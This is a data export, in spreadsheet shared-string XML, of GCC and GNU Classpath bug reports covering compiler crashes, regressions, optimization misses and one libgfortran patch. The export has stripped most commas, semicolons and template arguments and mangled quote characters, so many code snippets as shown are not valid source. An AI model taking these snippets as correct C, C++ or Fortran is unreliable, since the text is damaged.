  <si>
    <t>[4.3 Regression] ICE: verify_ssa failed - definition in block 23 does not dominate use in block 32</t>
  </si>
  <si>
    <t>I get the following ICE compiling Thunderbird with GCC 4.3.  pinskia says it's related to PR31036 but that it's worth filing a separate bug.
(sid)2723:tbm@em64t: ~] /usr/lib/gcc-snapshot/bin/g++ -c -O1 -fno-exceptions -fcheck-new icedove-xpccomponents.ii
xpccomponents.cpp: In member function 'nsresult nsXPCComponents_utils_Sandbox::CallOrConstruct(nsIXPConnectWrappedNative* JSContext* JSObject* PRUint32 jsval* jsval* PRBool*)':
xpccomponents.cpp:2407: error: definition in block 23 does not dominate use in block 32
for SSA_NAME: NMT.14386_417 in statement:
NMT.14386_131 = PHI 
PHI argument
NMT.14386_417
for PHI node
NMT.14386_131 = PHI 
xpccomponents.cpp:2407: internal compiler error: verify_ssa failed
Please submit a full bug report</t>
  </si>
  <si>
    <t>GCC-54542</t>
  </si>
  <si>
    <t>SFINAE bug: handling new expressions</t>
  </si>
  <si>
    <t>g++ 4.8.0 20120909 (experimental) fails to compile the following well-defined code:
    template 
        void f(decltype(new T(1 2)) *)
    {
        T(1 2)
    }
    template 
        void f(...)
    {}
    int main()
    {
        f(0)
    }
COLLECT_GCC_OPTIONS='-v' '-std=c++11' '-shared-libgcc' '-mtune=generic' '-march=pentiumpro'
test.cpp: In substitution of â€˜template void f(decltype (new T)*) [with T = ]â€™:
test.cpp:12:17:   required from here
test.cpp:2:14: error: new initializer expression list treated as compound expression [-fpermissive]
         void f(decltype(new T(1 2)) *)
              ^
test.cpp: In substitution of â€˜template void f(decltype (new T)*) [with T = int]â€™:
test.cpp:12:17:   required from here
test.cpp:2:14: error: new initializer expression list treated as compound expression [-fpermissive]
test.cpp:2:38: error: new initializer expression list treated as compound expression [-fpermissive]
         void f(decltype(new T(1 2)) *)
                                      ^
â€˜
Internal compiler error: Error reporting routines re-entered.
Compiler version info:
Target: i686-pc-linux-gnu
Configured with: ../configure --prefix=../target --enable-languages=cc++
Thread model: posix
GNU C++ (GCC) version 4.8.0 20120909 (experimental) (i686-pc-linux-gnu)
	compiled by GNU C version 4.8.0 20120909 (experimental) GMP version 5.0.2 MPFR version 3.1.0 MPC version 0.8.2
Explanation:
When T is int the new-expression is ill-formed and the error occurs in immediate context so the former f should be excluded from the set of candidate functions due to substitution failure.</t>
  </si>
  <si>
    <t>tsoae</t>
  </si>
  <si>
    <t>GCC-37302</t>
  </si>
  <si>
    <t>function parameters are declared too late</t>
  </si>
  <si>
    <t>3.3.1: The point of declaration for a name is immediately after its complete declarator (clause 8) and before its initializer (if any)
3.3.2: The potential scope of a function parameter name ... begins at its point of declaration.
So this ought to be well-formed:
void f (int t char (*buf_p)[sizeof(t)]) {}
but G++ doesn't declare 't' until after the closing paren so name lookup fails.
This wasn't a very interesting bug until the advent of late-specified return types which relies on naming parameters to be at all useful.</t>
  </si>
  <si>
    <t>GCC-7188</t>
  </si>
  <si>
    <t>Segfault with template class and recursive (incorrect) initalizer list.</t>
  </si>
  <si>
    <t>If a templated class is created the initializer list is appently not checked for recursive initialization ( my guess anyway ).  Code attached should never compile and indead doesn't under g++ 2.95 and 3.0 however 3.1 segfaults while attempting compile.  If template declaration from top of class is removed segfault does not occur and appropriate error message is issued.
This is not a big deal to myself as code is clearly very wrong. However since I was silly enough to accidently write it I imagine that it's possible someone else will do the same at some point.
Release:
3.1
Environment:
Debian w both self compiled g++ v 3.1 and from unstable vers. 3.1.1 20020606 (Debian prerelease)
How-To-Repeat:
attempt compile of attached code under g++ 3.1</t>
  </si>
  <si>
    <t>GCC-27325</t>
  </si>
  <si>
    <t>ICE with enabled exceptions and -fopenmp</t>
  </si>
  <si>
    <t>The code
struct A {
        ~A()
}
int f()
{
        A a
#pragma omp parallel firstprivate(a)
        for (int i = 0 i &lt; 5 ++i)
                int x = 0
        return 0
}
gives the following ICE with gcc version 4.2.0 20060426 (experimental):
LANG=C g++-4.2 -c -fopenmp  -o gcc-bug.o gcc-bug.cpp
gcc-bug.cpp: In function 'int f()':
gcc-bug.cpp:5: internal compiler error: in find_outermost_region_in_block at tree-cfg.c:4758
This is reduced from the same code as PR26913 (thanks for the fix). The ICE disappears with -fno-exceptions. I am not sure whether this is a duplicate of PR26823 but the ICE appears in a different file so maybe it is not.
In the process of reducing I got also two other ICEs:
gcc-bug.cpp:16: internal compiler error: in make_decl_rtl at varasm.c:1009
and
gcc-bug.cpp:27: error: basic block 5 edge lists are corrupted
gcc-bug.cpp:27: internal compiler error: verify_flow_info failed
Since these appear in a rather large file I'll reduce them further and file reports after this problem is fixed (if they still appear then).</t>
  </si>
  <si>
    <t>GCC-54605</t>
  </si>
  <si>
    <t>[4.8 Regression] MIPS64 ICEs while building libgfortran for n32</t>
  </si>
  <si>
    <t>(insn 28 27 29 2 (set (parallel:TF [
                (expr_list:REG_DEP_TRUE (reg:DI 204)
                    (const_int 0 [0]))
                (expr_list:REG_DEP_TRUE (reg:DI 205)
                    (const_int 8 [0x8]))
            ])
        (subreg:TF (reg:TI 209) 0)) /home/apinski/src/gcc-fsf/local/gcc/libgfortran/generated/_mod_r16.F90:41 -1
     (nil))
/home/apinski/src/gcc-fsf/local/gcc/libgfortran/generated/_mod_r16.F90:42:0: internal compiler error: in extract_insn at recog.c:2125
Please submit a full bug report
Last revision which is known to work:
190863
There is a revision after that worked but I don't have a record as my machine crashed due to an Ethernet driver bug.</t>
  </si>
  <si>
    <t>GCC-20548</t>
  </si>
  <si>
    <t>[4.3/4.4/4.5 regression] ACATS c52103x c52104x c52104y segfault</t>
  </si>
  <si>
    <t>It works on x86 on x86_64 it started failing on mainline between
LAST_UPDATED: Thu Mar 17 23:01:51 UTC 2005
LAST_UPDATED: Fri Mar 18 18:13:38 UTC 2005
.. C52103X ACATS 2.5 05-03-18 21:10:49
---- C52103X CHECK THAT IN ARRAY ASSIGNMENTS AND IN SLICE ASSIGNMENTS
                THE LENGTHS MUST MATCH ALSO CHECK WHETHER
                CONSTRAINT_ERROR OR STORAGE_ERROR ARE RAISED FOR LARGE
                ARRAYS.
   - C52103X NO CONSTRAINT_ERROR FOR TYPE WITH 'LENGTH = INTEGER'LAST + 
                3.
   - C52103X NO STORAGE_ERROR OR CONSTRAINT_ERROR RAISED WHEN ALLOCATING
                TWO BIG BOOLEAN ARRAYS.
/home/guerby/work/gcc/version-head/gcc/testsuite/ada/acats/run_all.sh: line 15:
 9036 Segmentation fault      $*</t>
  </si>
  <si>
    <t>GCC-21362</t>
  </si>
  <si>
    <t>ICE in make_edges at cfgbuild.c:327</t>
  </si>
  <si>
    <t>Compiling the attached jarfile with optimisation fails with gcj (GCC) 4.0.0
20050423 (Red Hat 4.0.0-2).
$ gcj -findirect-dispatch -shared bork.jar # works
$ gcj -findirect-dispatch -shared -O bork.jar
org/apache/catalina/session/FileStore.java: In class
'org.apache.catalina.session.FileStore':
org/apache/catalina/session/FileStore.java: In method
'org.apache.catalina.session.FileStore.save(org.apache.catalina.Session)':
org/apache/catalina/session/FileStore.java:0: internal compiler error: in
make_edges at cfgbuild.c:327</t>
  </si>
  <si>
    <t>GCC-32940</t>
  </si>
  <si>
    <t>REG_POINTER attribute on DECL_ARTIFICIAL pointers</t>
  </si>
  <si>
    <t>The ivopts pass fails to set the REG_POINTER attribute on a pseudo that is equal to two pseudos one of which has teh REG_POINTER attribute and the other is just a n offset from it.  This leads us to not sort the operands on an indexed load/store instruction causing performance problems on POWER6.
The test case used to recreate the problem is:
linux&gt; cat &gt; bug.c &lt;&lt;EOF
unsigned int *quadrant
unsigned int
fullGtU (int i1 int n)
{
  unsigned int s1 = 0
  for ( n &gt;= 0 n--)
    {
      s1 = quadrant[i1]
      i1 += n
    }
  return s1
}
EOF
linux&gt; /path/to/gcc -O1 -S -da bug.c
Resulting assembly:
fullGtU:
        li 00
        cmpwi 040
        blt 0.L3
        lis 9quadrant@ha
        lwz 11quadrant@l(9)
        addi 041
        mtctr 0
        addi 04-1
        cmpwi 70-1
        bge+ 7.L4
        li 01
        mtctr 0
.L4:
        slwi 932
        lwzx 0911  &lt;- bad operand ordering
        add 334
        addi 44-1
        bdnz .L4
.L3:
        mr 30
        blr
Bad RTL in bug.c.127r.expand:
(insn 21 20 22 bug.c:8 (set (reg/f:SI 129)
        (plus:SI (reg:SI 128)
            (reg:SI 121 [ quadrant.0 ]))) -1 (nil))
(insn 22 21 0 bug.c:8 (set (reg/v:SI 120 [ s1 ])
        (mem:SI (reg/f:SI 129) [0 S4 A32])) -1 (nil))
Eventually pseudo 129 )which has the REG_POINTER attribute) gets exchanged with the (plus:SI (reg:SI 128) (reg:SI 121 [ quadrant.0 ])) and pseudo 121 doesn't have the attribute so we end up failing to swap them.</t>
  </si>
  <si>
    <t>GCC-23619</t>
  </si>
  <si>
    <t>Missed pre opportunity</t>
  </si>
  <si>
    <t>On the following testcase:
int a[100]
void foo(int p int q)
{
  int i
  for (i = 0 i &lt; 100 i++)
    if (i &amp; 8)
      a[i] = (p + q) + 2
    else
      a[i] = (p + q) + 4
}
I expected (p+q) to be moved out of loop by pre but it does not happen. At
first I thought this is caused by reassociation which modifies the loop to
  for (i = 0 i &lt; 100 i++)
    if (i &amp; 8)
      a[i] = (p + 2) + q
    else
      a[i] = (p + 4) + q
But even with reassociation disabled PRE does nothing.</t>
  </si>
  <si>
    <t>GCC-8727</t>
  </si>
  <si>
    <t>[3.2/3.3 regression] compiler confused by inheritance from an anonymous struct</t>
  </si>
  <si>
    <t>This bug was reported by
jelenz@students.wisc.edu (John Lenz).
Attempting to inherit from a typedef'd anonymous struct seems
to confuse gcc (possibly in the generation of typeinfo or
virtual function tables).  The example given here works
with gcc-2.95.x and Red Hat's gcc 2.96 but fails with
gcc 3.0.x through gcc 3.2.1.
Release:
3.2.1
Environment:
i686-pc-linux-gnu
How-To-Repeat:
gcc -c bb.cxx
gives
bb.cxx:10: redefinition of `const char _ZTS4Heya[6]'
bb.cxx:10: `const char _ZTS4Heya[6]' previously defined here</t>
  </si>
  <si>
    <t>GCC-33487</t>
  </si>
  <si>
    <t>parallel v3: more functions not in right namespace</t>
  </si>
  <si>
    <t>As a corollary to PR 33486 here is a valid program that doesn't
compile in parallel mode:
------------------
#include 
void f () {
  int *p *q
  std::random_shuffle (p q)
}
------------------
The reason is that random_shuffle internally calls a function that isn't
found in the correct namespaces:
4.3.0/parallel/random_shuffle.h: In function 'void __gnu_parallel::sequential_random_shuffle(RandomAccessIterator RandomAccessIterator RandomNumberGenerator&amp;) [with RandomAccessIterator = int* RandomNumberGenerator = std::__parallel::c_rand_number]':
4.3.0/parallel/algo.h:1230:   instantiated from 'void std::__parallel::random_shuffle(_RAIter _RAIter RandomNumberGenerator&amp;) [with _RAIter = int* RandomNumberGenerator = std::__parallel::c_rand_number]'
4.3.0/parallel/algo.h:1217:   instantiated from 'void std::__parallel::random_shuffle(_RAIter _RAIter) [with _RAIter = int*]'
x.cc:4:   instantiated from here
4.3.0/parallel/random_shuffle.h:471: error: 'partial_sum' was not declared in this scope
4.3.0/parallel/random_shuffle.h: In function 'void __gnu_parallel::parallel_random_shuffle_drs_pu(__gnu_parallel::DRSSorterPU*) [with RandomAccessIterator = int* RandomNumberGenerator = __gnu_parallel::random_number]':
4.3.0/parallel/random_shuffle.h:380:   instantiated from 'void __gnu_parallel::parallel_random_shuffle_drs(RandomAccessIterator RandomAccessIterator typename std::iterator_traits::difference_type int RandomNumberGenerator&amp;) [with RandomAccessIterator = int* RandomNumberGenerator = std::__parallel::c_rand_number]'
4.3.0/parallel/random_shuffle.h:511:   instantiated from 'void __gnu_parallel::parallel_random_shuffle(RandomAccessIterator RandomAccessIterator RandomNumberGenerator) [with RandomAccessIterator = int* RandomNumberGenerator = std::__parallel::c_rand_number]'
4.3.0/parallel/algo.h:1228:   instantiated from 'void std::__parallel::random_shuffle(_RAIter _RAIter RandomNumberGenerator&amp;) [with _RAIter = int* RandomNumberGenerator = std::__parallel::c_rand_number]'
4.3.0/parallel/algo.h:1217:   instantiated from 'void std::__parallel::random_shuffle(_RAIter _RAIter) [with _RAIter = int*]'
x.cc:4:   instantiated from here
4.3.0/parallel/random_shuffle.h:187: error: 'partial_sum' was not declared in this scope
4.3.0/parallel/random_shuffle.h: In function 'void __gnu_parallel::sequential_random_shuffle(RandomAccessIterator RandomAccessIterator RandomNumberGenerator&amp;) [with RandomAccessIterator = int* RandomNumberGenerator = __gnu_parallel::random_number]':
4.3.0/parallel/random_shuffle.h:252:   instantiated from 'void __gnu_parallel::parallel_random_shuffle_drs_pu(__gnu_parallel::DRSSorterPU*) [with RandomAccessIterator = int* RandomNumberGenerator = __gnu_parallel::random_number]'
4.3.0/parallel/random_shuffle.h:380:   instantiated from 'void __gnu_parallel::parallel_random_shuffle_drs(RandomAccessIterator RandomAccessIterator typename std::iterator_traits::difference_type int RandomNumberGenerator&amp;) [with RandomAccessIterator = int* RandomNumberGenerator = std::__parallel::c_rand_number]'
4.3.0/parallel/random_shuffle.h:511:   instantiated from 'void __gnu_parallel::parallel_random_shuffle(RandomAccessIterator RandomAccessIterator RandomNumberGenerator) [with RandomAccessIterator = int* RandomNumberGenerator = std::__parallel::c_rand_number]'
4.3.0/parallel/algo.h:1228:   instantiated from 'void std::__parallel::random_shuffle(_RAIter _RAIter RandomNumberGenerator&amp;) [with _RAIter = int* RandomNumberGenerator = std::__parallel::c_rand_number]'
4.3.0/parallel/algo.h:1217:   instantiated from 'void std::__parallel::random_shuffle(_RAIter _RAIter) [with _RAIter = int*]'
x.cc:4:   instantiated from here
4.3.0/parallel/random_shuffle.h:471: error: 'partial_sum' was not declared in this scope</t>
  </si>
  <si>
    <t>GCC-18444</t>
  </si>
  <si>
    <t>[4.0 Regression] Multithreading broken on Unix95-class platforms</t>
  </si>
  <si>
    <t>The patch
2004-08-27  Jason Merrill  
	PR c++/13684
	* gimplify.c (gimplify_cleanup_point_expr): Handle CLEANUP_EH_ONLY.
	(gimple_push_cleanup): Add eh_only parm.
	(gimplify_target_expr): Pass it.
	* c.opt (-fno-threadsafe-statics): New option.
	* c-opts.c (c_common_handle_option): Handle it.
	* c-common.h (flag_threadsafe_statics): Declare it.
	* c-common.c (flag_threadsafe_statics): Record it.
	* doc/invoke.texi: Document it.
	* tsystem.h (_GNU_SOURCE): Define.
	* gthr-posix.h (__gthread_recursive_mutex_t): New typedef.
	(__GTHREAD_RECURSIVE_MUTEX_INIT): New macro.
	(__GTHREAD_RECURSIVE_MUTEX_INIT_FUNCTION): New macro.
	(__gthread_recursive_mutex_init_function): New fn.
	(__gthread_recursive_mutex_lock): New fn.
	(__gthread_recursive_mutex_trylock): New fn.
	(__gthread_recursive_mutex_unlock): New fn.
	* gthr-solaris.h gthr-single.h gthr-dce.h: Likewise.
	* gthr-win32.h gthr-vxworks.h: Likewise.
	* gthr.h: Document.
makes it impossible to build the compiler without --enable-threads=single on
Unix95-class (i.e. non Unix98-class platforms) because recursive mutexes
support is now mandatory for POSIX threads.  Among the affected platforms are
sparc-sun-solaris2.5.1 and sparc-sun-solaris2.6.
A recursive mutexes emulation was implemented in gthr-win32.h so I think it
should be doable to do the same in gthr-posix.h (and gthr-solaris.h).</t>
  </si>
  <si>
    <t>GCC-21958</t>
  </si>
  <si>
    <t>[4.1 Regression] verify_stmts reports tree node sharing assertion</t>
  </si>
  <si>
    <t>Using GCC 4.1 mainline checkout at 20050607.
$ ./i686-linux/gcc/xgcc -B ./i686-linux/gcc -S bug1.c -O1
bug1.c: In function â€˜fooâ€™:
bug1.c:2: error: Incorrect sharing of tree nodes
D.1290_47 = (charD.1 * *) pD.1236_3
(charD.1 * *) pD.1236_3
bug1.c:2: internal compiler error: verify_stmts failed.
Please submit a full bug report
I've narrowed down a testcase to:
void foo (char *p)
{
  char *endptr = p
  while (1)
    {
      int i = 1
      char **members
      if (p[1])
	{
	  do {
	    if (*p == '')
	      {
		i++
		*p = 0
	      }
	  } while (*++p)
	}
      members = (char **) p
      if (--i)
	{
	  p = endptr
	  do {
	    *members++ = ++p
	    if (!--i)
	      break
	    while (*++p) {}
	  } while (1)
	}
      *members = 0
    }
}</t>
  </si>
  <si>
    <t>GCC-37626</t>
  </si>
  <si>
    <t>ICE for automatic deallocation of character result variable</t>
  </si>
  <si>
    <t>The sample code below produces the following internal compiler error:
unique_A.f90: In function 'unique_a':
unique_A.f90:42: internal compiler error: Segmentation fault
The error seems to be associated with use of the PACK() intrinsic.
--CUT HERE--
function unique_A (x sorted) result (x_unique)
  character(*) dimension(:) intent(in)       :: x
  logical intent(in) optional                :: sorted
  character(LEN(x)) dimension(:) allocatable :: x_unique
  logical                                      :: sorted_
  character(LEN(x)) dimension(SIZE(x))        :: x_sorted
  integer                                      :: n_x
  logical dimension(SIZE(x))                  :: mask
  integer external                            :: b3ss_index
! Set up sorted_
  if(PRESENT(sorted)) then
     sorted_ = sorted
  else
     sorted_ = .FALSE.
  endif
! If necessary sort x
  if(sorted_) then
     x_sorted = x
  else
     x_sorted = x(b3ss_index(x))
  endif
! Set up the unique array
  n_x = SIZE(x)
  mask = (/.TRUE.x_sorted(2:n_x) /= x_sorted(1:n_x-1)/)
  allocate(x_unique(COUNT(mask)))
  x_unique = PACK(x_sorted MASK=mask)
! Finish
  return
end function unique_A</t>
  </si>
  <si>
    <t>GCC-28560</t>
  </si>
  <si>
    <t>[4.1/4.2 regression] Trouble with __attribute__ in template parameter</t>
  </si>
  <si>
    <t>The following (probably valid) code snippet triggers an ICE since GCC 3.1:
======================================================================
template struct A {}
template struct B
template struct C : A::X __attribute__((unused))&gt; {}
======================================================================
bug.cc:5: internal compiler error: in layout_type at stor-layout.c:1851
Please submit a full bug report [etc.]
A similar code snippet causes a segfault:
======================================================================
template struct A {}
template struct B
template struct A __attribute__((unused))&gt; {}
======================================================================</t>
  </si>
  <si>
    <t>GCC-31899</t>
  </si>
  <si>
    <t>[4.2 Regression] -g and using declaration causing ICE in reference_to_unused</t>
  </si>
  <si>
    <t>The following code compiled with -g causes an ICE on 4.2.0 RC3 (20070501) and on my most recent 4.3.0 snapshot build (20070427):
---------------------
namespace NS {
  int x = 0
  int 
}
using NS::ref
---------------------
test/ice.cc:6: internal compiler error: in reference_to_unused at dwarf2out.c:10128
This compiles cleanly with both 4.1.2 and 4.2.0 RC1 (20070316) suggesting that this was exposed by a fairly recent patch.
Note that in particular this impacts code using Boost.Lambda in the following style:
#include 
using boost::lambda::_1
...</t>
  </si>
  <si>
    <t>GCC-78996</t>
  </si>
  <si>
    <t xml:space="preserve"> uses macro as name</t>
  </si>
  <si>
    <t>Upon upgrading to g++-mp-7 (MacPorts gcc7 7-20170101_0) 7.0.0 20170101 (experimental) and compiling with significant options -std=c++1z -fconcepts I find a previously-unseen conflict.
At line 607 header  employs the identifier __unused as the name of a template parameter pack.
Unfortunately before #including  my test program has already #included  which on my system contains the line:
  #define __unused	__attribute__((unused))
This seems the source of the conflict that now produces diagnostics from the unchanged test program that last month compiled cleanly.
Preprocessed source is attached.  Thank you.</t>
  </si>
  <si>
    <t>webrown.cpp</t>
  </si>
  <si>
    <t>CLASSPATH-30384</t>
  </si>
  <si>
    <t>configure should check gcj version</t>
  </si>
  <si>
    <t>Hello!
I tried to compile the latest classpath release and receive following error:
make[2]: Entering directory `/tmp/tt/classpath-0.93/lib'
/usr/bin/gcj -Wno-deprecated --encoding=UTF-8 --bootclasspath '' --classpath ..:../vm/reference:..:../external/w3c_dom:../external/sax:../external/relaxngDatatype:.:: -C -d . -MD -MF lists/gnu-CORBA-CDR.deps -MT lists/gnu-CORBA-CDR.stamp -MP @lists/gnu-CORBA-CDR.list
../javax/swing/text/html/HTMLDocument.java:1557: error: Type `ElementSpec' not found in the declaration of the local variable `elems'.
         ElementSpec[] elems = new ElementSpec[size]
         ^
1 error
make[2]: *** [lists/gnu-CORBA-CDR.stamp] error 1
make[2]: Leaving directory `/tmp/tt/classpath-0.93/lib'
make[1]: *** [compile-classes] error 2
make[1]: Leaving directory `/tmp/tt/classpath-0.93/lib'
make: *** [all-recursive] error 1</t>
  </si>
  <si>
    <t>nickols_k</t>
  </si>
  <si>
    <t>GCC-52734</t>
  </si>
  <si>
    <t>[4.7/4.8 Regression] Incorrect optimization of uClibc sbrk()</t>
  </si>
  <si>
    <t>Created attachment 27005
Simplified code analogous to the sbrk problem
GCC 4.7.0 miscompiles uClibc 0.9.33 producing an unusable library.  The problem is in uClibc's sbrk() implementation -- GCC optimizes away sbrk's attempt to save a global variable before a called function changes it.  Basically that function (brk) is wrongly treated as an __attribute__((pure)) function.
The above text is to help anyone searching for the bug.  I'm attaching a distilled case showing the same problem.  The function ccc() is supposed to return the value of bbb before the second call to aaa() but when compiled with -Os it returns the value of bbb afterwards.
This is on i386-pc-linux-uclibc.  GCC 4.6.3 did not have the problem.</t>
  </si>
  <si>
    <t>GCC-57358</t>
  </si>
  <si>
    <t>segmentation fault with attribute(optimize(O0))</t>
  </si>
  <si>
    <t>Created attachment 30157
backtrace
The following code crashes GCC (gcc-4.8.0 -O2):
typedef void (*done)(void* arg)
struct t { done func void* arg }
static void test_func() __attribute__((optimize(O0)))                          static void test_func(struct t* a)
{
  a-&gt;func(a-&gt;arg)
}
Program received signal SIGSEGV Segmentation fault.
walk_aliased_vdefs_1 (ref=ref@entry=0x7fffffffda70 vdef=0x0
    walker=0x6f5d90  data=0x7fffffffda5f
    visited=0x7fffffffda28 cnt=0)
    at /mnt/work/oktet/transas/sources/4.8/gcc/gcc/tree-ssa-alias.c:2196
2196          gimple def_stmt = SSA_NAME_DEF_STMT (vdef)
Backtrace from gdb attached.
Reproducable with custom GCC build and gentoo 4.8. No error in 4.7.</t>
  </si>
  <si>
    <t>nbkolchin</t>
  </si>
  <si>
    <t>GCC-29840</t>
  </si>
  <si>
    <t>[4.3 Regression] build/genconditions ../../gcc/gcc/config/pa/pa.md &gt; tmp-condmd.c: /bin/sh: 13354 Memory fault(coredump)</t>
  </si>
  <si>
    <t>/test/gnu/gcc/objdir/./prev-gcc/xgcc -B/test/gnu/gcc/objdir/./prev-gcc/ -B/opt/g
nu64/gcc/gcc-4.3.0/hppa64-hp-hpux11.11/bin/ -c -g -O2 -DIN_GCC -W -Wall -Wwrite-
strings -Wstrict-prototypes -Wmissing-prototypes -fno-common -DHAVE_CONFIG_H -DG
ENERATOR_FILE -I. -Ibuild -I../../gcc/gcc -I../../gcc/gcc/build -I../../gcc/gcc/
../include -I../../gcc/gcc/../libcpp/include -I/opt/gnu64/gcc/gcc-4.3.0/include
 -I../../gcc/gcc/../libdecnumber -I../libdecnumber    -o build/genconditions.o .
./../gcc/gcc/genconditions.c
/test/gnu/gcc/objdir/./prev-gcc/xgcc -B/test/gnu/gcc/objdir/./prev-gcc/ -B/opt/g
nu64/gcc/gcc-4.3.0/hppa64-hp-hpux11.11/bin/ -g -O2 -DIN_GCC -W -Wall -Wwrite-str
ings -Wstrict-prototypes -Wmissing-prototypes -fno-common -DHAVE_CONFIG_H -DGENE
RATOR_FILE  -o build/genconditions \
            build/genconditions.o build/rtl.o build/read-rtl.o build/ggc-none.o
build/vec.o build/min-insn-modes.o build/gensupport.o build/print-rtl.o build/er
rors.o .././libiberty/libiberty.a
build/genconditions ../../gcc/gcc/config/pa/pa.md &gt; tmp-condmd.c
/bin/sh: 13354 Memory fault(coredump)
make[3]: *** [s-conditions] Error 139
This started about three days ago.</t>
  </si>
  <si>
    <t>GCC-36705</t>
  </si>
  <si>
    <t>Procedure pointers with attributes statements</t>
  </si>
  <si>
    <t>save :: p
procedure() :: p
pointer :: p
end
Error: PROCEDURE attribute conflicts with SAVE attribute in 'p' at (1)
Problem: The SAVE + PROCEDURE checking comes too early before the POINTER is seen. I think this program is valid.
Analogously:
subroutine bar(x)
 procedure() intent(in) :: x
 pointer :: x
end subroutine bar 
Here the POINTER comes too late for INTENT</t>
  </si>
  <si>
    <t>GCC-68088</t>
  </si>
  <si>
    <t>[6 Regression] ICE: RTL check: expected code 'reg' have 'subreg' in rhs_regno at rtl.h:1782 @ aarch64</t>
  </si>
  <si>
    <t>Created attachment 36581
reduced testcase
This ICE happened when building libdebug with an x86_64 -&gt; aarch64 crosscompiler.
RTL checking must be enabled.
$ cc1 -quiet testcase.c -O2         
testcase.c: In function 'foo':
testcase.c:13:5: internal compiler error: RTL check: expected code 'reg' have 'subreg' in rhs_regno at rtl.h:1782
     }
     ^
0xa90e27 rtl_check_failed_code1(rtx_def const* rtx_code char const* int char const*)
        /mnt/svn/gcc-trunk/gcc/rtl.c:811
0x551cb2 rhs_regno
        /mnt/svn/gcc-trunk/gcc/rtl.h:1782
0xe42a00 rhs_regno
        /mnt/svn/gcc-trunk/gcc/config/arm/aarch-common.c:429
0xe42a00 aarch_accumulator_forwarding(rtx_insn* rtx_insn*)
        /mnt/svn/gcc-trunk/gcc/config/arm/aarch-common.c:463
0xf08450 internal_insn_latency
        /home/smatz/build-229293-lto-fortran-checking-yes-rtl-df-disable-bootstrap-disable-graphite-aarch64/gcc/insn-automata.c:22594
0xf08450 insn_latency(rtx_def* rtx_def*)
        /home/smatz/build-229293-lto-fortran-checking-yes-rtl-df-disable-bootstrap-disable-graphite-aarch64/gcc/insn-automata.c:23777
0x11075ea dep_cost_1(_dep* unsigned int)
        /mnt/svn/gcc-trunk/gcc/haifa-sched.c:1489
0x11093ef dep_cost
        /mnt/svn/gcc-trunk/gcc/haifa-sched.c:1530
0x11093ef priority
        /mnt/svn/gcc-trunk/gcc/haifa-sched.c:1681
0x11094f0 set_priorities(rtx_insn* rtx_insn*)
        /mnt/svn/gcc-trunk/gcc/haifa-sched.c:7213
0xaaab8c compute_priorities()
        /mnt/svn/gcc-trunk/gcc/sched-rgn.c:2921
0xaadb3d schedule_region
        /mnt/svn/gcc-trunk/gcc/sched-rgn.c:3014
0xaadb3d schedule_insns
        /mnt/svn/gcc-trunk/gcc/sched-rgn.c:3412
0xaae2f3 schedule_insns
        /mnt/svn/gcc-trunk/gcc/sched-rgn.c:3397
0xaae2f3 rest_of_handle_sched
        /mnt/svn/gcc-trunk/gcc/sched-rgn.c:3616
0xaae2f3 execute
        /mnt/svn/gcc-trunk/gcc/sched-rgn.c:3724
Please submit a full bug report
with preprocessed source if appropriate.
Please include the complete backtrace with any bug report.
See  for instructions.
$ xgcc -v     
Using built-in specs.
COLLECT_GCC=/home/smatz/build-229293-lto-fortran-checking-yes-rtl-df-disable-bootstrap-disable-graphite-aarch64//gcc/xgcc
Target: aarch64-unknown-linux-gnu
Configured with: /mnt/svn/gcc-trunk//configure --disable-bootstrap --enable-checking=yesrtldf --enable-languages=cc++ltofortran --prefix=/mnt/svn/gcc-trunk/binary-229293-lto-fortran-checking-yes-rtl-df-disable-bootstrap-disable-graphite-aarch64/ --without-cloog --without-ppl --without-isl --host=x86_64-pc-linux-gnu --target=aarch64-unknown-linux-gnu --build=x86_64-pc-linux-gnu --with-sysroot=/home/aarch64-chroot
Thread model: posix
gcc version 6.0.0 20151025 (experimental) (GCC) 
Tested revisions:
r229293 - ICE
5-branch r229292 - OK
4_9-branch r229291 - OK</t>
  </si>
  <si>
    <t>GCC-14703</t>
  </si>
  <si>
    <t>Inadequate optimization of inline templated functions infinite loop in ipa-reference and memory hog</t>
  </si>
  <si>
    <t>This code:
=====================
#include 
namespace {
template  class fib {
 public:
   static const unsigned long long value = fib::value + fib::value
}
template  class fib {
 public:
   static const unsigned long long value = 1
}
template  class fib {
 public:
   static const unsigned long long value = 1
}
template inline unsigned long long fibconst()
{
   return fibconst() + fibconst()
}
template  inline unsigned long long fibconst()
{
   return 1ull
}
template  inline unsigned long long fibconst()
{
   return 1ull
}
template  inline unsigned long long fibconst()
{
   return 2ull
}
}
int main()
{
   ::std::cerr ::value ==  ::value &lt;&lt; \n
   ::std::cerr () ==  () &lt;&lt; \n
}
=====================
does not result in the call to fibconst being optimized out of existence.  In
fact only calls to fibconst() and lower are optimized out at -O3.  The
compiler should have plenty enough information to realize that they can all be
optimized out.  After all in order to expand the template at all it has to get
down to fibconst or fibconst or fibconst and build things back up again.
This is against gcc 3.4 pre-release.  I certainly don't expect anything to be
done to gcc 3.4 about it but I think it should still be taken care of someday.</t>
  </si>
  <si>
    <t>eric-gcc</t>
  </si>
  <si>
    <t>GCC-53555</t>
  </si>
  <si>
    <t>[4.8 Regression] Bootstrap failure</t>
  </si>
  <si>
    <t>On Linux/ia32 revision 188107 failed to bootstrap when
configured with
../src-trunk/configure \
       --with-arch=core2 --with-cpu=atom --prefix=/usr/local --enable-clocale=gnu --with-system-zlib --enable-shared --with-demangler-in-ld i686-linux --with-fpmath=sse --enable-languages=cc++fortranjavaltoobjc
Comparing stages 2 and 3
warning: gcc/cc1obj-checksum.o differs
warning: gcc/cc1plus-checksum.o differs
warning: gcc/cc1-checksum.o differs
Bootstrap comparison failure!
gcc/gimple-fold.o differs
gcc/jvspec.o differs
make[5]: *** [compare] Error 1
Revision 188104 is OK.</t>
  </si>
  <si>
    <t>GCC-21376</t>
  </si>
  <si>
    <t>libfortran E output format causes FPE</t>
  </si>
  <si>
    <t>There's an obvious bug in libfortran/io/write.c which causes a failure
to print 1.0 in exp. format - here's the fix:
diff -U3 -r gcc-4.0.0-old/libgfortran/io/write.c gcc-4.0.0/libgfortran/io/write.c
--- gcc-4.0.0-old/libgfortran/io/write.c        2005-04-05 15:24:36.000000000 +0100
+++ gcc-4.0.0/libgfortran/io/write.c    2005-05-04 07:55:12.000000000 +0100
@@ -3169 +31611 @@
     edigits = 2
   else
     {
-      edigits = 1 + (int) log10 (fabs(log10 (value)))
-      if (edigits &lt; 2)
+      double absexp = fabs(log10 (value))
+      if (absexp &lt; 100)
        edigits = 2
+      else
+       edigits = 1 + (int) log10 (absexp)
     }
